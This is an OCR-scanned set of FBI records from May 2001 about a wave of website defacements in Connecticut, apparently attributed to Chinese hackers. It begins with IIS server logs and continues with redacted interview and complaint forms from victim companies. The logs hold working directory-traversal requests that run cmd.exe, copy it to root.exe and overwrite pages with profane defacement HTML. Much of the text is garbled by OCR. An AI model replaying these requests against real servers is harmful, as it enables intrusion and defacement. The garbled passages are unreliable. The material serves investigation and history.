3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptaligns3D%22center$22%>*<font+siz 
e$3D4+color$3Dred*>contact: sysadmcn@yahoo. com. cn*</html*>>. ./scripts/default.as 


Pp, 

210.253.184.3, -, 5/7/01, 3:34:18, W3SVC1, GCGPO1, 192.168.1.13, 31, 431, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<bodytbgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
abletwidth%3D100%%*>*<td*>*<ptalign%3D%22center%22*>*<font+sizes3D7+colors3Dred* 
>fuckt+USA+Government*</font*>*<tr*>*<td*>*<ptalign%3D%22center%22%>*<font+sizes 
3D7+color%3Dred*>fuck+PoizonBOx*<tr®>*<td*>*<ptraligns$3D$22center%22*%>*<font+siz 
e%$3D4+color$3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>../scripts/default.ht 
m, ; 

210.253.184.3, -, 5/7/01, 3:34:20, W3SVC1, GCGPO1, 192.168.1.13, 31, 100, 382, 
502, 0, GET, /scripts/../../winnt/system32/cmd. exe, 
/ct+copyt+\winnt\system32\cmd.exet+root.exe, 

210.253.184.3, -, 5/7/01, 3:34:20, W3SVC1, GCGPO1, 192.168.1.13, 125, 432, 355, 
502, 0, GET, /scripts/root.exe, 
/ct+echot*<html*>*<body+bgcolor%$3Dblack*>*<br*>*<br*>“*<br*>*<br*>*<br*>*<br*>*<t 
ablet+widtht3D100%*>*<td*>*<ptalign$3D%22center$22%>*<font+sizes3D7+color%3Dred”* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign%3D%22center%22*%>*<font+sizes 
3D7+colort3Dred*>fuck+PoizonBOx*<tr*>*<td*>“*<ptalign%3D%22center$22*>*<font+siz 
e$3D4+color%3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>../iissamples/index.a 
SP, 

210.253.184.3, -, 5/7/01, 3:34:20, W3SVC1, GCGPO1, 192.168.1.13, 16, 432, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<body+tbgcolor$3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
ablet+width%3D100%*>*<td*>*<ptalign$3D%22center$22°>*<font+size$3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center$22*>*<font+sizes 
3D7+color%3Dred*>fuck+PoizonBOx*<tr®>*<td*>*<ptaliqn%3D%22center$22*>*<font+siz 
e$3D4+color$3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>../iissamples/index.h 
tm, ies: 
210.253.184.3, -, 5/7/01, 3:34:20, W3SVC1, GCGPO1, 192.168.1.13, 15, 434, 355, 
502, OQ, GET, /scripts/root.exe, 
/ctechot*<html*>*<body+tbgcolor$3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>°<t 
able+widtht3D100%*>“<td*>*<ptalign%$3D%22center%$22°%>*<font+sizes3D7+color$3Dred”* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center$22*>*<font+sizes 
3D7+color%3Dred*>fuck+PoizonBOx*<tr“>*<td*>*<ptaligns3D%22center$22">*<font+siz 
e$3D4t+coloré3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>../iissamples/default 
-asp, 

210.253.184.3, -, 5/7/01, 3:34:20, W3SVC1, GCGPO1, 192.168.1.13, 16, 434, 355, 
502, 0, GET, /scripts/root.exe, 

/ctechot*<html *>*<bodytbgcolor$3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
able+widtht3D100%*>“<td*>*<ptalign$3D%22center%22%>*<font+size$3D7+color%3Dred* 
>fuck+USAt+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center$22*>*<font+sizes 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign$3D%22center$22*%>*<font+siz 
e33D4+color$3Dred*>contact: sysadmen@yahoo. com.cn*</html*>>../iissamples/default 
-htm, : ‘ 

210.253.184.3, -, 5/7/01, 3:34:23, W3SVC1, GCGPO1, 192.168.1.13, 31, 100, 382, 
502, 0, GET, /scripts/../../winnt/system32/cmd.exe, 
/ct+copy+\winnt\system32\cmd.exet+root.exe, 


210.253.184.3, -, 5/7/01, 3:34:23, W3SVC1, GCGPO1, 192.168.1.13, 156, 434, 355, 
502, 0, GET,- /scripts/root.exe, 
/ct+echot+*<html*>*<body+bgcolor$3Dblack*>*<br*>*<br*>“*<br*>*<br*>*<br*>*<br>*<t 
ablet+twidth$3D100%*>*<td*>*<ptalign%3D%22center%22°>*<font+sizet3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign%3D%22center$22*>*<font+sizes 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign%3D%22center%$22*>*<font+siz 
e$3D4+color$3Dred*>contact: sysadmen@yahoo. com.cn*</html*>>. ./w3rootbackup/index 
-asp, 

210.253.184.3, -, 5/7/01, 3:34:23, W3SVC1, GCGPO1, 192.168.1.13, 16, 434, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<body+tbgcolor$3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
able+width$3D100%*%>*%<td*>*<ptalign%3D$22center%22%>*<font+sizet3D7+color%3Dred* 
>fucktUSAtGovernment*</font*>*<tr*>*<td*>*<ptaligns3D%22center$22*>*<font+size%s 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptaligns3D%22center%$22%>*<font+siz 
e%3D4+color$3Dred*>contact: sysadmcn@yahoo. com. cn*</html*>>../w3rootbackup/index 
-htm, 

210.253.184.3, -, 5/7/01, 3:34:23, W3SVC1, GCGPO1, 192.168.1.13, 47, 436, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<body+bgcolor%$3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
ablet+twidth$3D1003%>*<td*>*<ptaligns3D%22center$22%>*<font+sizet3D7+color$3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptaligns3D%2Zcenter%22*>*<font+sizes 
3D7+color%$3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptaligné3D%22center%22*>“<font+siz 
e%3D4+color%3Dred*>contact: sysadmcn@yahoo. com. cn*</htm1*>>../w3rootbackup/defau 
lt.asp, 

210.253.184.3, -, 5/7/01, 3:34:25, W3SVC1, GCGPO1, 192.168.1.13, 31, 436, 355, 
502, 0, GET, /scripts/root.exe, ; 
/crechot+*<html*>*<body+bgcolor$3Dblack*>*<br“>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
ablet+width33D100%%>*<td*>*<ptralign$3D$22center%22°>*<font+sizet3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptaligns3D%22center$22*>*<font+sizes 
3D7+color$3Dred*>fuck+Poi zonBOx*<tr*>*<td*>*<ptalign$3D%22center$22*>*<fontt+siz 
e$3D4+colors3Dred*>contact: sysadmen@yahoo. com. cn*</html*>>../w3rootbackup/defau 
lt.htm, 

210.253.184.3, -, 5/7/01, 3:34:25, W3SVC1, GCGPO1, 192.168.1.13, 46, 100, 382, 
502, 0, GET, /scripts/../../winnt/system32/cmd. exe, 
/c+copy+\winnt\system32\cmd.exetroot.exe, 

210.253.184.3, -, 5/7/01, 3:34:25, W3SVC1, GCGPO1, 192.168.1.13, 140, 430, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<body+bgcolor$3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
abletwidth$3D100%%>*<td*>*<ptalign%3D$22center%22*>*<font+size$3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center$22°>*<font+size% 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign$3D%22center%22*>*%<fontt+siz 
e33D4+color%$3Dred*>contact: sysadmcn@yahoo.com.cn*</html*>>../gkodmail/index.asp 


t 

210.253.184.3, -, 5/7/01, 3:34:25, W3SVC1, GCGPO1, 192.168.1.13, 32, 430, 355, 
502, 0, GET, /scripts/root.exe, 
/c+rechot*<html*>*<bodyt+bgcolor%3Dblack*>*<br%>*<br*>*<br*>*<br*>*<br*>*<br*o*<t 
able+width%3D100%*>*<td*>*<ptalign$3D%22center%22°>*<font+sizet3D7+colors3Dred* 
>fuck+USA+Government’*</font*>*<tr*>*<td*>*<ptalign$3D%22center$22*%>°<font+sizes 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>“<ptalign$3D%22center$22*>*<font+siz 
es3D4t+color%$3Dred*>contact: sysadmen@yahoo. com. cn*</html*>>../gkodmail/index.htm 


, 

210.253.184.3, -, 5/7/01, 3:34:25, W3SVC1, GCGPO1, 192.168.1.13, 31, 432, 355, 
502, 0, GET, /scripts/root.exe, - 
/ctechot*<html*>*<body+bgcolors3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
abletwidth%3D100%*>*<td*>*<ptalign$3D%22center%22*>*<font+sizes3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center$22%>*<fonttsizes 
3D7+color$3Dred*>fuck+Poi zonBOx*<tr*>*<td*>*<ptalign%3D%22center%22*>*<fontt+siz 
e$3D4+color%3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>../gkodmail/default.a 
SP, 


St 


210.253.184.3, -, 5/7/01, 3:34:27, W3SVCl, GCGPO1, 192.168.1.13, 47, 432, 355, 
502, 0, GET, /scripts/root.exe, 
/c+echot*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
able+widtht3D100%“>“<td*>*<p+align$3D%22center%$22*%>*<font+size$3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center%22*%>“<font+sizes 
3D7+colors3Dred*>f£uck+PoizonBOx*<tr*>*<td*>*<ptalign$3D%22center$22*%>*<font+siz 
e%3D4t+color%3Dred*>contact: sysadmcn@yahoo.com.cn*</html*>>../gkodmail/default-h 
tm, é 

210.253.184.3, ~, 5/7/01, 3:34:27, W3SVC1, GCGPO1, 192.168.1.13, 31, 100; 382, 
502, 0, GET, /scripts/../../winnt/system32/cmd.exe, 
/c+copyt\winnt\system32\cmd.exetroot.exe, 

210.253.184.3, -, 5/7/01, 3:34:31, W3SVC1, GCGPO1, 192.168.1.13, 62, 428, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<body+tbgcolor$3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br“>“*<br*>*<t 
abletwidth%3D100%%*>*<td*>*<ptalign?3D%22center$22*>*<font+sizes3D7+color%3Dred”* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center$22°>*<font+sizes 
3D7+color%3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign$3D%22center%22*%>*<font+siz 
e$3D4+colors3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>../dimail/index.asp, 
210.253.184.3, -, 5/7/01, 3:34:31, W3SVC1, GCGPO1, 192.168.1.13, 16, 428, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<body+tbgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
abletwidth%3D100%*>*<td*>*<ptalign%3D%22center$22°>*<font+sizes3D7+color$3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%$22center%22*>*<font+sizes 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptaligns3D%22center%22%>*<fontt+siz 
e$3D4+color%3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>../dimail/index.htm, 
210.253.184.3, -, 5/7/01, 3:34:31, W3SVC1, GCGPO1, 192.168.1.13, 15, 430, 355, 
502, 0, GET, /scripts/root.exe, : 
/ctechot*<htnl*>*<body+bgcolor$3Dblack*>“<br*>*<br*>*<br*>*<br*>“<br*>*<br*>*<t 
abletwidth$3D100%*>“*<td*>“*<ptalign%3D%22center$22*>*<font+sizes3D7+color%3Dred* 
>fuckt+USA+Government*</font*>*<tr*>*<td*>*<ptaligns3D%22center%22*>*<font+sizes 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>“*<ptalign$3D%$22center$22*%>*<fonttsiz 
e%3D4+colors3Dred*>contact: sysadmcen@yahoo.com.cn*</html*>>../dimail/default.asp 


f 

210.253.184.3, -, 5/7/01, 3:34:31, W3SVC1, GCGPO1, 192.168.1.13, 31, 430, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<bodytbgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br%>*<br“>*<br*>*<t 
ablet+widtht3D100%*>*<td*>*<ptalign$3D%22center%22*%>%<font+size$3D7+color$3Dred* 
>fuckt+USA+Government*</font*>*<tr*>*<td*>*<pralign$3D%22center$22*>*<font+tsizes 
3D7+color$3Dred*>£uck+PoizonBOx*<tr*>*<td*>*<ptaligns3D%22center%22%>*<font+siz 
e$3D4+color%3Dred*>contact: sysadmcen@yahoo. com. cn*</html*>>../dimail/default.htm 


f . 

210.253.184.3, -, 5/7/01, 3:34:31, W3SVC1, GCGPO1, 192.168.1.13, 16, 78, 881, 
200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /ctdirt..\wwwroot\, 
210.253.184.3, -, 5/7/01, 3:34:34, W3SVC1, GCGPO1, 192.168.1.13, 47, 100, 382, 
502, 0, GET, /scripts/../../winnt/system32/cmd.exe, 

/ctcopyt\winnt\system32\cmd. exet+root.exe, 

210.253.184.3, -, 5/7/01, 3:34:34, W3SVC1, GCGPO1, 192.168.1.13, 156, 431, 355, 
502, 0, GET, /scripts/root.exe, 
/ctecho+*<html*>*<body+bgcolors3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<bpre>*<t 
ablet+twidth83D100%*>“<td*>*<p+align%3D%$22center%$22%>*<font+sizes3D7+color$3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptaligns3D%22center$22*%>*<font+sizes 
3D7+color%3Dred*>fuck+Poi zonBOx*<txr*>*<td*>*<ptalign%3D$22center%22°>*<font+siz 
e$3D4+colors3Dred*>contact: sysadmcn@yahoo.com.cn*</htmL*>>../wwwroot/./index.as 
Pp, 

210.253.184.3, -, 5/7/01, 3:34:34, W3SVC1, GCGPO1, 192.168.1.13, 31, 431, 355, 
502, 0, GET, /scripts/root.exe, : 

/erechot*<html “*>*<bodytbgcolor$3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<bre>*<t 
abletwidth$3D100%*>*<td“>*<ptalign%3D%$22center$22*>*<font+size$3D7+color%3Dred* 
>fuck+USAt+Government*</font*>*<tr*>*<td*>*<ptalign$3D$22center$22%>*<font+sizes 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign’3D$22center$22*>*<fonttsiz 


e33D4+color$3Dred*>contact: sysadmcn@yahoo.com.cn*</htmL*>>../wwwroot/./index.ht 
m, 


210.253.184.3, -, 5/7/01, 3:34:34, W3SVC1, GCGPO1, 192.168.1.13, 31, 433, 355, 
502, 0, GET, /scripts/root.exe, 
/crechot*<html*>*<body+bgcolor$3Dblack*>“<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
able+width%3D100%*>*<td*>*<ptalign%3D%22center$22“>*<font+size$3D7+color%3Dred* 
>fuck+USAt+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center%22*>*<font+sizes 
3D7+color%3Dred*>f£uck+PoizonBOx*<tr°>*<td*>*<ptalignt3D%$22center%22%>*<fontt+siz 
e$3D4+color%3Dred*>contact: sysadmen@yahoo. com.cn*</html*>>../wwwroot/./default. 
asp, : 

210.253.184.3, -, 5/7/01, 3:34:36, W3SVC1, GCGPO1, 192.168.1.13, 32, 433, 355, 
502, 0, GET, /scripts/root.exe, 
/ct+echot*<html*>*<body+bgcolor$3Dblack*>*<br*>*<br*>*<br%>*<br*>*<br*>*<br*>*<t 
abletwidth%3D100%*>*<td*>*<ptalign%3D%22center$22*%>%<fonttsize$3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign%3D%22center$22°%>“<fontt+size% 
3D7+color$3Dred*>fuck+Poi zonBOx*<tr*>*<td*>*<ptralignt3D%22center$22*>*<font+siz 
e%3D4+color%3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>../wwwroot/./default. 
htm, : 

210.253.184.3, -, 5/7/01, 3:34:36, W3SVC1, GCGPO1, 192.168.1.13, 47, 100, 382, 
502, 0, GET, /scripts/../../winnt/system32/cmd.exe, 
/ce+copy+\winnt\system32\cmd.exet+root.exe, 

210.253.184.3, -, 5/7/01, 3:34:36, W3SVC1, GCGPO1, 192.168.1.13, 156, 432, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<body+bgcolor$3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
ablet+width3D100%%>*<td*>*<ptalign33D%22center$22%>*<font+size$3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center$22*>*<font+sizes 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign$3D%22center%22°>*<font+siz 
e$3D4+color$3Dred*>contact: sysadmcn@yahoo. com. cn*</html*>>../wwwroot/../index.a 
SP, 

210.253.184.3, -, 5/7/01, 3:34:36, W3SVC1, GCGPO1, 192.168.1.13, 16, 432, 355, 
502, 0, GET, /scripts/root.exe, 
/c+echot*<html*>“<body+bgcolor$3Dblack*>*<br*>*<br*>*<br%>*<br*>*<br*>*<br*>*<t 
ablet+width$3D100%*>*<td*>*<ptalign$3D%22center%22*>*<fontt+size$3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>“<td*>*<ptaligné3D%$22center$22*>*<font+sizes 
3D7+color$3Dred* >fuck+Poi zonBOx*<tr*>*<td*>*<ptraligns3D%22center$22*>*<font+siz 
e$3D4+color$3Dred*>contact: sysadmen@yahoo. com. cn*</htm1l*>>../wwwroot/../index.h 
tm, 

210.253.184.3, -, 5/7/01, 3:34:38, W3SVC1, GCGPO1, 192.168.1.13, 16, 434, 355,° 
502, 0, GET, /scripts/root.exe, 

/c+echot*<html *>*<bodytbgcolor%3Dblack*>*<br*>*<br*>"<br*>*<br*>*<br*>*<br*>*<t 
ablet+twidth$3D100%*>“<td*>“<ptalign33D%$22center$22*>*<font+sizet3D7+color$3Dred* 
>fuck+USAt+Government*</font*>*<tr*>“*<td*>*<ptralign$3D%$22center$22*>*<font+sizes 
3D7+colort3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign%3D%22center$22°>*<font+siz 
e&3D4+color$3Dred*>contact: sysadmcn@yahoo. com.cn*</html*>>../wwwroot/../default 
-asp, 

240.253.184.3, -, 5/7/01, 3:34:38, W3SVC1, GCGPO1, 192.168.1.13, 16, 434, 355, 
502, 0, GET, /scripts/root.exe, 
/etrechot*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br“>*<br*>*<br*>“<br*>*<br7>*<t 
able+width83D100%*>*<td*>*<ptalign%3D%22centexr%22*>*<font+size$3D7+color$3Dred* 
>fuck+USA+Government*</font*>*<tr>“*<td*>*<ptalign%3D%22center%22*>*<fonttsize%s 
3D7+colors3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptaligns3D$22center$22*>*<fontt+siz 
e$3D4+color$3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>. ./wwwroot/../default 
-htm, - 


fuck USA Government 


fuck PoizonBOx 


contact:sysadmen@yahoo.com.cn 


Kesult o of intrusions letecs/tod | in ed on 
black background 


FD-302 (Rev. 10-6-95) @ S 


aje 
FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/11/2001 


[ Janus Computer Systems, 900 Chapel 
Street, Suite 527, New Haven Connecticut, eet 7" 


advised of the ji the interviewing agent and the nature of 
the interview. provided the following information. 


a ee ee 
Haven Chamber of Commerce website. ‘The websites are gnhcc.com and 


newhavenchamber.com. The websites were defaced on May 6, 2001. 
rovided a copy of the logs regarding the defacement to 
SA The logs are on 3 1/2 disk and are attached in an 


FD340 1A envelope. 


Investigation on at New Haven, Connecticut 


Date dictated 5/11/2001 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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b7E 


FD:71 (Rev. 3-27-95) ® e 
Complaint Form 


_ 
€ 
NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: [_] Negative [] See below 


Subject's name and aliases Character of case 
1] - 
b6 


b7C 


Complainant , | Protect Source bTE 


Complaint received 


[FJ Personal [x] Telephonic Date O5/ 03/2001 Time 1:00 pm 


Address of Subject Complainant's address and telephone number 


8 FJ Clarke Cir., Be 
(203) 778-4925 ext.| | 


= DOB 


Scars, marks and other data 
“A 


Employer Address 4 


Subject’s 
Description 


Vehicle Description b7c 


Facts of Complaint 


Complainant advised that his company, Starstruck, sells“watch 
batteries, tools and supplies over its website, www.star 
On 05/03/01 at approximately 4:00 a.m., the website was’ "hacked into" and 
the homepage was changed to a black screen with red/-Tettering that read, 
a A Government" and "Fuck poisonbox." 


b3 
b6 
b7C 
b7E 


7 aaa ce ee a 
Prong frets 


rs 


omplaint received by) } BLOCK STAMP b7c 


FD-71 (Rev. 3-27-95) © @ 
Complaint Form 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 


Indices: Negative See below 

Subject's name and aliases Character of case 

UNSUBS Computer Intrusion 
Complainant Protect Source 
DBA, CIDRA 
Complaint received 

Personal XX Telephonic Date 05/18/01 Time 8:15 am 

Address of Subject Complainant's address and telephone number 
50 Barnes Industrial North, Wallingford, 
CT, 
Complainant's DOB Sex 

Male 
Race Male Height Hair Build Birth date and birth place 
os 
3 S Age Female Weight Eyes Complexion Social Security Number 
& Scars, marks and other data 
Employer Address Telephone 


Vehicle Description 


Facts of Complaint 


employed at CIDRA, an optical networking company, advised 
that CIDRA's website, located at www.cidra.com, has been hacked into 
twice, first on Wednesday evening and again last night. The "hacker" 
altered the data that pops up when the visitor to the site clicks ona 
link entitled optical sensing systems, an icon at the bottom right hand 
corner of the web page. The message that the hacker inserted was 
"fFuckusa.com" or "fuck usa.com". [——Jaoes not believe that CIDRA 
has suffered monetary damages due to the intrusion, but noted that 


customers have encountered the message. He has logs which ing Po 


possible IP addresses from which the hacker might be operating. 


is uncertain whether the intrusion is from outside the company, or if one 


Do not write in this space. 


SA pls forw acl Fe 


(Complaint received by) 
LU44O . 


Cid fa. pd 


b6 
b7c 


b6 
b7c 


b3 
b6 
b7C¢ 
b7E 


of the approximate 370 employees of CIDRA might be responsible. 
CIDRA is working on security measures to protect its website but 
remains vulnerable for the time being to additional intrusions. 

requested any assistance the FBI might be able to 
provide to identify the offender. 


b6 
b7C 


| = nn mT errr rT SD 
| ® | 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/25/2001 


L essetone Peo Rams Industrial North, b6é 
Wallingford, Connecticut, was advised of the b7C 


j of the interviewing agent and the nature of the interview. 
provided the following information. 


CIDRA's websites are cidra.com and cidrasensors.com and 
were defaced on May 16, 2001. e-mailed a copy of the logs 
regarding the defacement to SA The logs have been saved 
to CD-R and are attached in an FD340 1A envelope. 


Investigation on 5/25/2001 at New Haven, Connecticut 
b3 
File # Date dictated 5/25/2001 b6 


b7c 
b A b7E 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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ie 


FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/8/2001 


Command Technology Inc., 404 Thames Street, 
Groton, Connecticut, was advised of the identity of 
the interviewing agent and the nature of the interview. 
provided the following information. 


of Command Technology Inc., 
which is a company that provides online access to manuals and 
service bulletins regarding aircraft repair. Command Technology 
has contracts involving the United States Government and Sikorsky 
Aircraft. 


Command Technologies website is c2aircraft.com. The 
website is password protected. It was defaced on May 6, 2001. 
-mailed a copy of the logs regarding the defacement to SA 
The logs have been saved to CD-R and are attached in an 
FD340 1A envelope. 


Investigation on 5/7/2001 at New Haven, Connecticut 


Date dictated 5/8/2001 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 


b6 
b7C 


b6 
b7Cc 


b3 
b6 
b7C 
b7E 


nee | ® @ 
FD-302 (Rev. 10-6-95) 


ae 
FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/27/2001 


b6 
| ) Prmsoft, 999 Oronoque Lane, Stratford, Connecticut b7Cc 


06614, Telephone 203-375-1684 ext[ | telephonically contacted 
Special Agent[____]to advise that their computer system at 
prmsoft.com had the web pages defaced. 


His company develops software for the long term health 
care industry. They operate a Windows NT 4.0 system which is fully 
patched. Sitting behind a Sonic firewall they have two web 
servers, one with exchange mail and the other a test bed. Both of 
the web servers were defaced with the same image, with the same 
files altered and from the same site. The attack took place on May 
5, 2001 at about 11:50 pm Eastern Daylight Time. The attacker used 
HTTP commands to over write his index.html, index.asp, default.html 
and default.asp files with the new files. 


furnished a co i , and the altered b6 
files to SA be e-mail to The e-mail and the b7C 
attached logs and altered files were saved to a zip drive. The bTE 


attachment, which had been sent zipped, was saved as both a zipped 
and unzipped file. 


“Haven Connecticut 


(telephonically) 


b3 
File # Date dictated 05-27-01 b6 
ee b7c 
by bT7E 
asst 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 


Pa) 
‘& FD-71 (Rev. 3-27-95) & & 
. Complaint Form 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: [_] Negative LJ See below 


Subject's name and aliases Character of case 


Internet Fraud 
66F-NH-C40399 


Complainant [] Protect Source 
Syscon, Inc. 
Glastonbury, CT 


Complaint received 


LJ Personal [J Telephonic Date 05/08/01 Time 10:20 a 


Address of Subject Lae address and telephone number 


860-657-1370 
Complainant's DOB 


Scars, marks and other data 


Subject’s 
Description 


Employer Address Telephone 


Vehicle Description 


Facts of Complaint 


Complainant,[ sd called on behalf of his client. [jis 


employed by Syscon, Inc.*(Syscon) located in Glastonbury, CT. Syscon 
serves as the systems administrator for Temenos. Temenos is a brokerage 
firm kocated at 195 Farmington Avenue, Farmington, CT. 


Last night an Internet hacker, hacked into Temenos' system and stole 
customer profiles which contained sensitive client information to include 
stock portfolios. The intruder also placed anti-government material and 
profanity on Temenos' website. 


Temenos utilizes a Microsoft website package and contracts Syscon to 


Do not write in this space. 


omplaint received by) 


provide administrative and security services. 


informed Syscon of the incident. 


Complainant was provided with both 


at Temenos and 


the FBI internet 


site, www.IFCCFBI.gov and the helpline telephone number, 
1-800-257-3221. However, due to the sensitive nature of the 


material which was taken by the hacker, 
filing a formal complaint with this office. 


was interested in 


Should you have any addition questions regarding the 
incident,[___|would be the person to contact since his client 


(Temenos) is not as computer literate. 


b6 
b7C 


(Rev. 10-01-1999) & & 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/25/2001 


ton. quae atta: sa] 


New Haven 


From: New Haven 
Squad 10 
Contact: 


SA 
Approved By: 
Drafted By: 
Case ID #: (Pending) 


Title: Hacker/Honker Union of China 
Illinois Secretary of State 


Intrusion 

04/03/2001 
Synopsis: To provide information and log files from Connecticut 
victims. 
Enclosure(s): 1) Original and one copy of an FD-302 for 


Command Technologies Inc. One CD-R containing logs 


regarding the defacement. 2 Original and one copy of an FD-302 
and FD-71 for CIDRA. One CD-R containing logs 
regarding the defacement. 3 Original and one copy of an FD-71 


Starstruckinc.com. 4) Original and one copy of 
an FD-71 for Syscon Inc. 5) Original and one copy 
of an FD-302 for. Janus Computer Systems. One 3 


1/2 disk containing logs regarding the defacement. 6) Original 

and one copy of an FD-302 for[_____—__—diGreentiela Consulting 

Group. One CD-R containing logs regardin he defacement. 7) 

Original and one copy of an FD-302 ae Prmsoft. One 
eracement. 


zip disk containing logs regarding the 8) Original 


and one copy of an FD-302 for Americares. One CD- 
R containing logs regarding the defacement. 9) Original and one 
copy of an FD-71 | ane Subway Inc. One CD-R 
containing logs regarding the defacement. 10) Original and one 
copy of an FD-71 for Milford Police Department, Milford, 
Connecticut. 


Details: New Haven Division has received numerous complaints 
regarding website defacements appearing to be attributable to 
Chinese hackers. The various victims have provided information 
and log files regarding the defacements as detailed below. 


b3 
b6 
b7Cc 
b7E 


b6 
b7C 


To: Chicago prom MPrew Haven S 
re: [_] 05/25/2001 


1) On May 7, 2001 Command Technologies Inc., 404 
Thames Street, Groton, Connecticut, 06340, Poe ey 


advised that their website c2aircraft.com had been defaced. a 


Command Technologies provided log information and a copy of the 
defaced website which is on the enclosed CD-R. 


2) On May 18, 2001, 
Industrial North, Wallingford, Connecticut, 
advised that their website cidra.com had been defaced. 
provided log information and a copy of the defaced website whic 
is on the enclosed CD-R. 


CIDRA, 50 Barnes 


3) On May 3, 2001 Starstruck, 8 FJ Clarke 
Cir., Bethel, Connecticut, advi hat their 
website starstruckinc.com had been defaced. advised that 


no log information was available. 


4) [| syscon inc, ___idsois the 8 


for Temenos Brokera j rmington 
Ave., Farmington, CT. [advised that Temenos 
Brokerage Firm advised him that Temenos' computer system had been 


compromised and sensitive client information including es CE 


portfolios had been taken. Their website was also defaced. 
advised that no log information was available. 


Janus Computer Systems, (203) 562- 
3333, Ext for the Greater New 
Haven Chamber of Commerce website. advised that the 
